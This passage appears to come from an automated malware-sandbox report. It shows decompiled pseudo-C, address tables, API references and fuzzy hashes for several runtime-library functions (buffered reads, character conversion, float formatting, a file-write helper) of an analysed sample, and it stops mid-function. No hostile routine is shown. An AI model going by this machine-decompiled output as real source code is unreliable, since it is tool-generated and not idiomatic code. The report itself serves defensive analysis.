Opcode Fuzzy Hash: 68252e2aabc9db2da3c32abe8a95286ef25f2bf5a015f2012d521dff1bbfc377
Instruction Fuzzy Hash: 7F81B07160020AEFDB14DF59D98079ABBF1FF14304F54492EE40567381D3BAAAA4CB96

Uniqueness

Uniqueness Score: -1.00%

Function 00422130 Relevance: 6.2, APIs: 4, Instructions: 163
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 72%

			E00422130(char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
				char* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* __ebx;
				void* __esi;
				signed int _t74;
				char _t81;
				signed int _t86;
				signed int _t88;
				signed int _t91;
				signed int _t94;
				signed int _t97;
				signed int _t98;
				char* _t99;
				signed int _t100;
				signed int _t102;
				signed int _t103;
				signed int _t104;
				char* _t110;
				signed int _t113;
				signed int _t117;
				signed int _t119;
				void* _t120;

				_t99 = _a4;
				_t74 = _a8;
				_v8 = _t99;
				_v12 = _t74;
				if(_a12 == 0) {
					L5:
					return 0;
				}
				_t97 = _a16;
				if(_t97 == 0) {
					goto L5;
				}
				_t124 = _t99;
				if(_t99 != 0) {
					_t119 = _a20;
					__eflags = _t119;
					if(_t119 == 0) {
						L9:
						__eflags = _a8 - 0xffffffff;
						if(_a8 != 0xffffffff) {
							_t74 = E0042B420(_t99, 0, _a8);
							_t120 = _t120 + 0xc;
						}
						__eflags = _t119;
						if(__eflags == 0) {
							goto L3;
						} else {
							__eflags = _t97 - (_t74 | 0xffffffff) / _a12;
							if(__eflags > 0) {
								goto L3;
							}
							L13:
							_t117 = _a12 * _t97;
							__eflags =  *(_t119 + 0xc) & 0x0000010c;
							_t98 = _t117;
							if(( *(_t119 + 0xc) & 0x0000010c) == 0) {
								_t100 = 0x1000;
							} else {
								_t100 =  *(_t119 + 0x18);
							}
							_v16 = _t100;
							__eflags = _t117;
							if(_t117 == 0) {
								L41:
								return _a16;
							} else {
								do {
									__eflags =  *(_t119 + 0xc) & 0x0000010c;
									if(( *(_t119 + 0xc) & 0x0000010c) == 0) {
										L24:
										__eflags = _t98 - _t100;
										if(_t98 < _t100) {
											_t81 = E0042B2F2(_t98, _t119, _t119);
											__eflags = _t81 - 0xffffffff;
											if(_t81 == 0xffffffff) {
												L46:
												return (_t117 - _t98) / _a12;
											}
											_t102 = _v12;
											__eflags = _t102;
											if(_t102 == 0) {
												L42:
												__eflags = _a8 - 0xffffffff;
												if(__eflags != 0) {
													E0042B420(_a4, 0, _a8);
												}
												 *((intOrPtr*)(E00425208(__eflags))) = 0x22;
												L4:
												E004242D2();
												goto L5;
											}
											_t110 = _v8;
											 *_t110 = _t81;
											_t98 = _t98 - 1;
											_v8 = _t110 + 1;
											_t103 = _t102 - 1;
											__eflags = _t103;
											_v12 = _t103;
											_t100 =  *(_t119 + 0x18);
											_v16 = _t100;
											goto L40;
										}
										__eflags = _t100;
										if(_t100 == 0) {
											_t86 = 0x7fffffff;
											__eflags = _t98 - 0x7fffffff;
											if(_t98 <= 0x7fffffff) {
												_t86 = _t98;
											}
										} else {
											__eflags = _t98 - 0x7fffffff;
											if(_t98 <= 0x7fffffff) {
												_t44 = _t98 % _t100;
												__eflags = _t44;
												_t113 = _t44;
												_t91 = _t98;
											} else {
												_t113 = 0x7fffffff % _t100;
												_t91 = 0x7fffffff;
											}
											_t86 = _t91 - _t113;
										}
										__eflags = _t86 - _v12;
										if(_t86 > _v12) {
											goto L42;
										} else {
											_push(_t86);
											_push(_v8);
											_push(E0042816B(_t119));
											_t88 = E0042B5C4();
											_t120 = _t120 + 0xc;
											__eflags = _t88;
											if(_t88 == 0) {
												 *(_t119 + 0xc) =  *(_t119 + 0xc) | 0x00000010;
												goto L46;
											}
											__eflags = _t88 - 0xffffffff;
											if(_t88 == 0xffffffff) {
												L45:
												_t64 = _t119 + 0xc;
												 *_t64 =  *(_t119 + 0xc) | 0x00000020;
												__eflags =  *_t64;
												goto L46;
											}
											_t98 = _t98 - _t88;
											__eflags = _t98;
											L36:
											_v8 = _v8 + _t88;
											_v12 = _v12 - _t88;
											_t100 = _v16;
											goto L40;
										}
									}
									_t94 =  *(_t119 + 4);
									_v20 = _t94;
									__eflags = _t94;
									if(__eflags == 0) {
										goto L24;
									}
									if(__eflags < 0) {
										goto L45;
									}
									__eflags = _t98 - _t94;
									if(_t98 < _t94) {
										_t94 = _t98;
										_v20 = _t98;
									}
									_t104 = _v12;
									__eflags = _t94 - _t104;
									if(_t94 > _t104) {
										goto L42;
									} else {
										E00429544(_v8, _t104,  *_t119, _t94);
										_t88 = _v20;
										_t120 = _t120 + 0x10;
										 *(_t119 + 4) =  *(_t119 + 4) - _t88;
										_t98 = _t98 - _t88;
										 *_t119 =  *_t119 + _t88;
										goto L36;
									}
									L40:
									__eflags = _t98;
								} while (_t98 != 0);
								goto L41;
							}
						}
					}
					_t74 = (_t74 | 0xffffffff) / _a12;
					__eflags = _t97 - _t74;
					if(_t97 <= _t74) {
						goto L13;
					}
					goto L9;
				}
				L3:
				 *((intOrPtr*)(E00425208(_t124))) = 0x16;
				goto L4;
			}

0x0042213a
0x0042213d
0x00422143
0x00422146
0x00422149
0x00422166
0x00000000
0x00422166
0x0042214b
0x00422150
0x00000000
0x00000000
0x00422152
0x00422154
0x0042216f
0x00422172
0x00422174
0x00422182
0x00422182
0x00422186
0x0042218e
0x00422193
0x00422193
0x00422196
0x00422198
0x00000000
0x0042219a
0x004221a2
0x004221a4
0x00000000
0x00000000
0x004221a6
0x004221a9
0x004221ac
0x004221b3
0x004221b5
0x004221bc
0x004221b7
0x004221b7
0x004221b7
0x004221c1
0x004221c4
0x004221c6
0x004222af
0x00000000
0x004221cc
0x004221cc
0x004221cc
0x004221d3
0x00422214
0x00422214
0x00422216
0x00422281
0x00422287
0x0042228a
0x004222e1
0x00000000
0x004222e7
0x0042228c
0x0042228f
0x00422291
0x004222b7
0x004222b7
0x004222bb
0x004222c5
0x004222ca
0x004222d2
0x00422161
0x00422161
0x00000000
0x00422161
0x00422293
0x00422296
0x00422299
0x0042229a
0x0042229d
0x0042229d
0x0042229e
0x004222a1
0x004222a4
0x00000000
0x004222a4
0x00422218
0x0042221a
0x0042223e
0x00422243
0x00422249
0x0042224b
0x0042224b
0x0042221c
0x0042221e
0x00422224
0x00422236
0x00422236
0x00422236
0x00422238
0x00422226
0x0042222b
0x0042222d
0x0042222d
0x0042223a
0x0042223a
0x0042224d
0x00422250
0x00000000
0x00422252
0x00422252
0x00422253
0x0042225d
0x0042225e
0x00422263
0x00422266
0x00422268
0x004222ef
0x00000000
0x004222ef
0x0042226e
0x00422271
0x004222dd
0x004222dd
0x004222dd
0x004222dd
0x00000000
0x004222dd
0x00422273
0x00422273
0x00422275
0x00422275
0x00422278
0x0042227b
0x00000000
0x0042227b
0x00422250
0x004221d5
0x004221d8
0x004221db
0x004221dd
0x00000000
0x00000000
0x004221df
0x00000000
0x00000000
0x004221e5
0x004221e7
0x004221e9
0x004221eb
0x004221eb
0x004221ee
0x004221f1
0x004221f3
0x00000000
0x004221f9
0x00422200
0x00422205
0x00422208
0x0042220b
0x0042220e
0x00422210
0x00000000
0x00422210
0x004222a7
0x004222a7
0x004222a7
0x00000000
0x004221cc
0x004221c6
0x00422198
0x0042217b
0x0042217e
0x00422180
0x00000000
0x00000000
0x00000000
0x00422180
0x00422156
0x0042215b
0x00000000

APIs

_memset.LIBCMT ref: 0042218E
__read_nolock.LIBCMT ref: 0042225E
__filbuf.LIBCMT ref: 00422281
_memset.LIBCMT ref: 004222C5

Part of subcall function 00425208: __getptd_noexit.LIBCMT ref: 00425208

Memory Dump Source

Source File: 00000006.00000002.634364468.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.634364468.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.634364468.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_E640.jbxd

Yara matches

Similarity

API ID: _memset$__filbuf__getptd_noexit__read_nolock
String ID:
API String ID: 2974526305-0
Opcode ID: 2663944f2ecd2356e6bc0f9128c733698aaf16daf3cf10d514d26d316ebfdedf
Instruction ID: 8e6e0b0b404069c1ace538d88af1fa9e5aae20a8402e44ab6f3f0d96efeb0f41
Opcode Fuzzy Hash: 2663944f2ecd2356e6bc0f9128c733698aaf16daf3cf10d514d26d316ebfdedf
Instruction Fuzzy Hash: 9A51D830B00225FBCB148E69AA40A7F77B1AF11320F94436FF825963D0D7B99D61CB69

Uniqueness

Uniqueness Score: -1.00%

Function 0043C677 Relevance: 6.1, APIs: 4, Instructions: 97
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E0043C677(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				intOrPtr _v12;
				int _v20;
				int _t35;
				int _t38;
				intOrPtr* _t44;
				int _t47;
				short* _t49;
				intOrPtr _t50;
				intOrPtr _t54;
				int _t55;
				int _t59;
				char* _t62;

				_t62 = _a8;
				if(_t62 == 0) {
					L5:
					return 0;
				}
				_t50 = _a12;
				if(_t50 == 0) {
					goto L5;
				}
				if( *_t62 != 0) {
					E0042019C( &_v20, _a16);
					_t35 = _v20;
					__eflags =  *(_t35 + 0xa8);
					if( *(_t35 + 0xa8) != 0) {
						_t38 = E00422BCC( *_t62 & 0x000000ff,  &_v20);
						__eflags = _t38;
						if(_t38 == 0) {
							__eflags = _a4;
							_t59 = 1;
							__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t62, 1, _a4, 0 | _a4 != 0x00000000);
							if(__eflags != 0) {
								L21:
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t31 = _t54 + 0x70;
									 *_t31 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t31;
								}
								return _t59;
							}
							L20:
							_t44 = E00425208(__eflags);
							_t59 = _t59 | 0xffffffff;
							__eflags = _t59;
							 *_t44 = 0x2a;
							goto L21;
						}
						_t59 = _v20;
						__eflags =  *(_t59 + 0x74) - 1;
						if( *(_t59 + 0x74) <= 1) {
							L15:
							__eflags = _t50 -  *(_t59 + 0x74);
							L16:
							if(__eflags < 0) {
								goto L20;
							}
							__eflags = _t62[1];
							if(__eflags == 0) {
								goto L20;
							}
							L18:
							_t59 =  *(_t59 + 0x74);
							goto L21;
						}
						__eflags = _t50 -  *(_t59 + 0x74);
						if(__eflags < 0) {
							goto L16;
						}
						__eflags = _a4;
						_t47 = MultiByteToWideChar( *(_t59 + 4), 9, _t62,  *(_t59 + 0x74), _a4, 0 | _a4 != 0x00000000);
						_t59 = _v20;
						__eflags = _t47;
						if(_t47 != 0) {
							goto L18;
						}
						goto L15;
					}
					_t55 = _a4;
					__eflags = _t55;
					if(_t55 != 0) {
						 *_t55 =  *_t62 & 0x000000ff;
					}
					_t59 = 1;
					goto L21;
				}
				_t49 = _a4;
				if(_t49 != 0) {
					 *_t49 = 0;
				}
				goto L5;
			}

0x0043c67f
0x0043c684
0x0043c69e
0x00000000
0x0043c69e
0x0043c686
0x0043c68b
0x00000000
0x00000000
0x0043c690
0x0043c6ad
0x0043c6b2
0x0043c6b5
0x0043c6bc
0x0043c6db
0x0043c6e2
0x0043c6e4
0x0043c728
0x0043c737
0x0043c745
0x0043c747
0x0043c757
0x0043c757
0x0043c75b
0x0043c75d
0x0043c760
0x0043c760
0x0043c760
0x0043c760
0x00000000
0x0043c766
0x0043c749
0x0043c749
0x0043c74e
0x0043c74e
0x0043c751
0x00000000
0x0043c751
0x0043c6e6
0x0043c6e9
0x0043c6ed
0x0043c716
0x0043c716
0x0043c719
0x0043c719
0x00000000
0x00000000
0x0043c71b
0x0043c71f
0x00000000
0x00000000
0x0043c721
0x0043c721
0x00000000
0x0043c721
0x0043c6ef
0x0043c6f2
0x00000000
0x00000000
0x0043c6f6
0x0043c709
0x0043c70f
0x0043c712
0x0043c714
0x00000000
0x00000000
0x00000000
0x0043c714
0x0043c6be
0x0043c6c1
0x0043c6c3
0x0043c6c8
0x0043c6c8
0x0043c6cd
0x00000000
0x0043c6cd
0x0043c692
0x0043c697
0x0043c69b
0x0043c69b
0x00000000

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0043C6AD
__isleadbyte_l.LIBCMT ref: 0043C6DB
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0043C709
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0043C73F

Memory Dump Source

Source File: 00000006.00000002.634364468.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.634364468.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.634364468.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_E640.jbxd

Yara matches

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 5d9d0dd00b9c666e2ffb8edf641007e90d7f333e82c154efbd4b40f2329fca1d
Instruction ID: 9bb69ce0c337472f3e835d3bfc0adb25a23875f1fe15b1d3b69bac0ae3c4b713
Opcode Fuzzy Hash: 5d9d0dd00b9c666e2ffb8edf641007e90d7f333e82c154efbd4b40f2329fca1d
Instruction Fuzzy Hash: 4E31F530600206EFDB218F75CC85BBB7BA5FF49310F15542AE865A72A0D735E851DF98

Uniqueness

Uniqueness Score: -1.00%

Function 0040F0E0 Relevance: 6.1, APIs: 4, Instructions: 86
filestringCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E0040F0E0(intOrPtr* __ecx, char _a4, intOrPtr _a24) {
				struct _OVERLAPPED* _v8;
				intOrPtr _v16;
				char _v17;
				long _v24;
				intOrPtr _v28;
				char _v48;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				int _t23;
				intOrPtr _t25;
				void* _t31;
				intOrPtr* _t35;
				signed int _t37;
				short* _t40;
				void* _t43;
				intOrPtr* _t46;
				CHAR* _t49;
				intOrPtr _t50;
				void* _t51;
				short* _t53;

				_push(0xffffffff);
				_push(0x4caa48);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t50;
				_t51 = _t50 - 0x20;
				_push(_t31);
				_t46 = __ecx;
				_v8 = 0;
				_t22 =  >=  ? _a4 :  &_a4;
				_t23 = CreateFileW( >=  ? _a4 :  &_a4, 0x40000000, 2, 0, 2, 0x80, 0);
				_t43 = _t23;
				if(_t43 == 0xffffffff) {
					L8:
					if(_a24 >= 8) {
						_t23 = L00422587(_a4);
					}
					 *[fs:0x0] = _v16;
					return _t23;
				}
				_t53 = _t51 - 0x18;
				_v17 = 0;
				_t40 = _t53;
				 *((intOrPtr*)(_t40 + 0x14)) = 7;
				 *(_t40 + 0x10) = 0;
				 *_t40 = 0;
				if( *_t46 != 0) {
					_t35 = _t46;
					_t31 = _t35 + 2;
					do {
						_t25 =  *_t35;
						_t35 = _t35 + 2;
					} while (_t25 != 0);
					_t37 = _t35 - _t31 >> 1;
					L6:
					_push(_t37);
					E00415C10(_t31, _t40, _t43, _t46, _t46);
					E00412840( &_v48, _v17);
					_t51 = _t53 + 0x18;
					_t49 =  >=  ? _v48 :  &_v48;
					WriteFile(_t43, _t49, lstrlenA(_t49),  &_v24, 0);
					_t23 = CloseHandle(_t43);
					if(_v28 >= 0x10) {
						_t23 = L00422587(_v48);
						_t51 = _t51 + 4;
					}
					goto L8;
				}
				_t37 = 0;
				goto L6;
			}

0x0040f0e3
0x0040f0e5
0x0040f0f0
0x0040f0f1
0x0040f0f8
0x0040f0fb
0x0040f0fe
0x0040f10b
0x0040f11b
0x0040f125
0x0040f12b
0x0040f130
0x0040f1bf
0x0040f1c3
0x0040f1c8
0x0040f1cd
0x0040f1d5
0x0040f1e0
0x0040f1e0
0x0040f136
0x0040f139
0x0040f13d
0x0040f141
0x0040f148
0x0040f14f
0x0040f155
0x0040f15b
0x0040f15d
0x0040f160
0x0040f160
0x0040f163
0x0040f166
0x0040f16d
0x0040f16f
0x0040f16f
0x0040f173
0x0040f17e
0x0040f183
0x0040f190
0x0040f1a1
0x0040f1a8
0x0040f1b2
0x0040f1b7
0x0040f1bc
0x0040f1bc
0x00000000
0x0040f1b2
0x0040f157
0x00000000

APIs

CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000), ref: 0040F125
lstrlenA.KERNEL32(?,?,00000000), ref: 0040F198
WriteFile.KERNEL32(00000000,?,00000000), ref: 0040F1A1
CloseHandle.KERNEL32(00000000), ref: 0040F1A8

Memory Dump Source

Source File: 00000006.00000002.634364468.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.634364468.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.634364468.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_E640.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleWritelstrlen
String ID:
API String ID: 1421093161-0
Opcode ID: 8dcdb29b30e90d7a1a332818a0ca901bbec9447c67136dec38103fe4222814ab
Instruction ID: 4e0a1a2928686de7afe91093b481d52cb6f90b47dd46c4e49af8be4df8d63ea4
Opcode Fuzzy Hash: 8dcdb29b30e90d7a1a332818a0ca901bbec9447c67136dec38103fe4222814ab
Instruction Fuzzy Hash: DF31F531A00104EBDB14AF68DC4ABEE7B78EB05704F50813EF9056B6C0D7796A89CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 004409B9 Relevance: 6.0, APIs: 4, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004409B9(void* __edx, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;

				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E00440F28(__eflags, _a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					_t35 = _t25 - 0x66;
					if(_t25 != 0x66) {
						__eflags = _t25 - 0x61;
						if(_t25 == 0x61) {
							L7:
							_t26 = E00440A5D(_a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							__eflags = _t25 - 0x41;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t26 = E004411DC(__edx, __esi, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
							}
						}
						L9:
						return _t26;
					} else {
						return E004410FD(__edx, __esi, _t35, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}

0x004409bc
0x004409c2
0x00440a35
0x00000000
0x004409c9
0x004409c9
0x004409cc
0x004409e7
0x004409ea
0x00440a0a
0x00440a1c
0x004409ec
0x004409ec
0x004409ef
0x00000000
0x004409f1
0x00440a03
0x00440a03
0x004409ef
0x00440a3a
0x00440a3e
0x004409ce
0x004409e6
0x004409e6
0x004409cc

APIs

__cftof_l.LIBCMT ref: 004409DD

Part of subcall function 004410FD: __fltout2.LIBCMT ref: 00441126

__cftog_l.LIBCMT ref: 00440A03
__cftoe_l.LIBCMT ref: 00440A35

Memory Dump Source

Source File: 00000006.00000002.634364468.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.634364468.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.634364468.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_E640.jbxd

Yara matches

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
Instruction ID: 47779ad8523d68e9f2e2bd7ddfa488ab055a33a4313e19cc57a45add4f9be60e
Opcode Fuzzy Hash: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
Instruction Fuzzy Hash: B6014E7240014EBBDF125E85CC428EE3F62BB29354F58841AFE1968131C63AC9B2AB85

Uniqueness

Uniqueness Score: -1.00%

Function 004127A0 Relevance: 6.0, APIs: 4, Instructions: 39
stringCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E004127A0(WCHAR* __ecx, void* __edx) {
				int _v8;
				void* __ebx;
				void* __edi;
				short* _t12;
				void* _t17;
				char* _t18;
				int _t21;

				_t16 = __edx;
				_push(__ecx);
				_t12 = __ecx;
				_push(_t17);
				_t5 =  !=  ? 0xfde9 : 0;
				_v8 =  !=  ? 0xfde9 : 0;
				_t2 = lstrlenW(__ecx) + 1; // 0x1
				_t21 = _t2;
				_t18 = E00420C62(_t12, _t16, _t17, _t21);
				E0042B420(_t18, 0, _t21);
				WideCharToMultiByte(_v8, 0, _t12, 0xffffffff, _t18, _t21, 0, 0);
				return _t18;
			}

0x004127a0
0x004127a3
0x004127a7
0x004127b1
0x004127b2
0x004127b6
0x004127bf
0x004127bf
0x004127c9
0x004127ce
0x004127e4
0x004127f2

APIs

lstrlenW.KERNEL32 ref: 004127B9
_malloc.LIBCMT ref: 004127C3

Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(007D0000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5

_memset.LIBCMT ref: 004127CE
WideCharToMultiByte.KERNEL32(?,00000000,?,000000FF,00000000,00000001,00000000,00000000), ref: 004127E4

Memory Dump Source

Source File: 00000006.00000002.634364468.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.634364468.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.634364468.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_E640.jbxd

Yara matches

Similarity

API ID: AllocateByteCharHeapMultiWide_malloc_memsetlstrlen
String ID:
API String ID: 2824100046-0
Opcode ID: 09908775b5e5bc8df4309979956ae60541863bcf2bd73145411733e911d939f3
Instruction ID: 750470dcacb0e1f47d667e481962336cdcd22eeec5e51d764cc358051e51787a
Opcode Fuzzy Hash: 09908775b5e5bc8df4309979956ae60541863bcf2bd73145411733e911d939f3
Instruction Fuzzy Hash: C6F02735701214BBE72066669C8AFBB769DEB86764F100139F608E32C2E9512D0152F9

Uniqueness

Uniqueness Score: -1.00%

Function 00414920 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 319
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E00414920(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, signed int _a4, intOrPtr _a8, intOrPtr* _a12, signed int _a16, intOrPtr _a20) {
				intOrPtr _v8;
				signed int _v12;
				signed int _t128;
				intOrPtr _t134;
				intOrPtr* _t137;
				intOrPtr _t140;
				signed int _t144;
				intOrPtr* _t146;
				intOrPtr _t149;
				intOrPtr _t153;
				intOrPtr _t158;
				intOrPtr _t163;
				intOrPtr _t164;
				intOrPtr* _t165;
				intOrPtr _t167;
				intOrPtr _t171;
				intOrPtr _t191;
				signed int _t194;
				intOrPtr* _t195;
				intOrPtr _t196;
				intOrPtr* _t200;
				signed int _t203;
				intOrPtr _t204;
				intOrPtr* _t205;
				intOrPtr _t207;
				intOrPtr* _t208;
				intOrPtr* _t210;
				signed int _t212;
				intOrPtr* _t213;
				intOrPtr* _t217;
				intOrPtr* _t221;
				intOrPtr* _t223;
				intOrPtr* _t224;
				signed int _t226;
				intOrPtr* _t231;
				void* _t232;
				intOrPtr* _t235;
				intOrPtr* _t237;
				intOrPtr* _t240;
				intOrPtr* _t241;
				signed int _t244;
				signed int _t246;
				signed int _t247;
				intOrPtr* _t251;
				void* _t258;
				void* _t259;

				_t200 = __ecx;
				_t259 = _t258 - 8;
				_t251 = __ecx;
				_t244 = _a4;
				_t128 =  *(__ecx + 0x10);
				if(_t128 < _t244) {
					L86:
					_push("invalid string position");
					E0044F26C(__eflags);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					return  *((intOrPtr*)(_t200 + 0x10));
				} else {
					_t226 = _a16;
					_t200 =  *((intOrPtr*)(_a12 + 0x10));
					if(_t200 < _t226) {
						goto L86;
					} else {
						_v8 = _t128 - _t244;
						_t191 = _a8;
						_t192 =  <  ? _v8 : _t191;
						_v12 = _t200 - _t226;
						_a8 =  <  ? _v8 : _t191;
						_t200 =  <  ? _v12 : _a20;
						_t194 = _t128 - _a8;
						_v12 = _t194;
						_t195 = _a12;
						_a20 = _t200;
						if((_t128 | 0xffffffff) - _t200 <= _t194) {
							_push("string too long");
							E0044F23E(__eflags);
							goto L86;
						} else {
							_t134 = _a8;
							_t246 = _v12 + _t200;
							_v8 = _v8 - _t134;
							_v12 = _t246;
							_t247 = _a4;
							if( *(__ecx + 0x10) < _t246) {
								E00415D50(_t195, __ecx, _t247, __ecx, _v12, 0);
								_t200 = _a20;
								_t226 = _a16;
								_t134 = _a8;
							}
							if(_t251 == _t195) {
								_t196 = _a20;
								__eflags = _t196 - _t134;
								if(_t196 > _t134) {
									__eflags = _t226 - _t247;
									if(_t226 > _t247) {
										_t203 = _t247 + _t134;
										_a4 = _t203;
										__eflags = _t203 - _t226;
										if(_t203 > _t226) {
											_t204 =  *((intOrPtr*)(_t251 + 0x14));
											__eflags = _t204 - 8;
											if(_t204 < 8) {
												_a12 = _t251;
											} else {
												_a12 =  *_t251;
												_t196 = _a20;
											}
											__eflags = _t204 - 8;
											if(_t204 < 8) {
												_t205 = _t251;
											} else {
												_t205 =  *_t251;
											}
											E0040B600(_t205 + _t247 * 2, _a12 + _t226 * 2, _t134);
											_t207 =  *((intOrPtr*)(_t251 + 0x14));
											__eflags = _t207 - 8;
											if(_t207 < 8) {
												_t137 = _t251;
											} else {
												_t137 =  *_t251;
											}
											__eflags = _t207 - 8;
											if(_t207 < 8) {
												_t208 = _t251;
											} else {
												_t208 =  *_t251;
											}
											_a20 = _a4 + _a4;
											E0040B600(_t208 + (_t247 + _t196) * 2, _a4 + _a4 + _t137, _v8);
											_t140 =  *((intOrPtr*)(_t251 + 0x14));
											__eflags = _t140 - 8;
											if(_t140 < 8) {
												_t231 = _t251;
											} else {
												_t231 =  *_t251;
											}
											__eflags = _t140 - 8;
											if(_t140 < 8) {
												_t210 = _t251;
											} else {
												_t210 =  *_t251;
											}
											_push(_t196 - _a8);
											_t144 = _a16 + _t196;
											_t211 = _t210 + _a20;
											__eflags = _t210 + _a20;
										} else {
											_t149 =  *((intOrPtr*)(_t251 + 0x14));
											__eflags = _t149 - 8;
											if(_t149 < 8) {
												_t235 = _t251;
											} else {
												_t235 =  *_t251;
											}
											__eflags = _t149 - 8;
											if(_t149 < 8) {
												_t213 = _t251;
											} else {
												_t213 =  *_t251;
											}
											E0040B600(_t213 + (_t247 + _t196) * 2, _t235 + _a4 * 2, _v8);
											_t153 =  *((intOrPtr*)(_t251 + 0x14));
											__eflags = _t153 - 8;
											if(_t153 < 8) {
												_t231 = _t251;
											} else {
												_t231 =  *_t251;
											}
											__eflags = _t153 - 8;
											if(_t153 < 8) {
												_push(_t196);
												_t144 = _a16 - _a8 + _t196;
												_t211 = _t251 + _t247 * 2;
											} else {
												_push(_t196);
												_t144 = _a16 - _a8 + _t196;
												_t211 =  *_t251 + _t247 * 2;
											}
										}
									} else {
										_t158 =  *((intOrPtr*)(_t251 + 0x14));
										__eflags = _t158 - 8;
										if(_t158 < 8) {
											_t237 = _t251;
										} else {
											_t237 =  *_t251;
										}
										__eflags = _t158 - 8;
										if(_t158 < 8) {
											_t217 = _t251;
										} else {
											_t217 =  *_t251;
										}
										E0040B600(_t217 + (_t247 + _t196) * 2, _t237 + (_a8 + _t247) * 2, _v8);
										_t163 =  *((intOrPtr*)(_t251 + 0x14));
										__eflags = _t163 - 8;
										if(_t163 < 8) {
											_t231 = _t251;
										} else {
											_t231 =  *_t251;
										}
										__eflags = _t163 - 8;
										if(_t163 < 8) {
											_t144 = _a16;
											_push(_t196);
											_t211 = _t251 + _t247 * 2;
										} else {
											_t144 = _a16;
											_push(_t196);
											_t211 =  *_t251 + _t247 * 2;
										}
									}
									_t232 = _t231 + _t144 * 2;
								} else {
									_t164 =  *((intOrPtr*)(_t251 + 0x14));
									__eflags = _t164 - 8;
									if(_t164 < 8) {
										_t221 = _t251;
									} else {
										_t221 =  *_t251;
									}
									__eflags = _t164 - 8;
									if(_t164 < 8) {
										_t165 = _t251;
									} else {
										_t165 =  *_t251;
									}
									E0040B600(_t165 + _t247 * 2, _t221 + _t226 * 2, _t196);
									_t167 =  *((intOrPtr*)(_t251 + 0x14));
									__eflags = _t167 - 8;
									if(_t167 < 8) {
										_t240 = _t251;
									} else {
										_t240 =  *_t251;
									}
									__eflags = _t167 - 8;
									if(_t167 < 8) {
										_t223 = _t251;
									} else {
										_t223 =  *_t251;
									}
									_push(_v8);
									_t232 = _t240 + (_a8 + _t247) * 2;
									_t211 = _t223 + (_t247 + _t196) * 2;
								}
								E0040B600(_t211, _t232);
							} else {
								_t171 =  *((intOrPtr*)(_t251 + 0x14));
								if(_t171 < 8) {
									_a4 = _t251;
								} else {
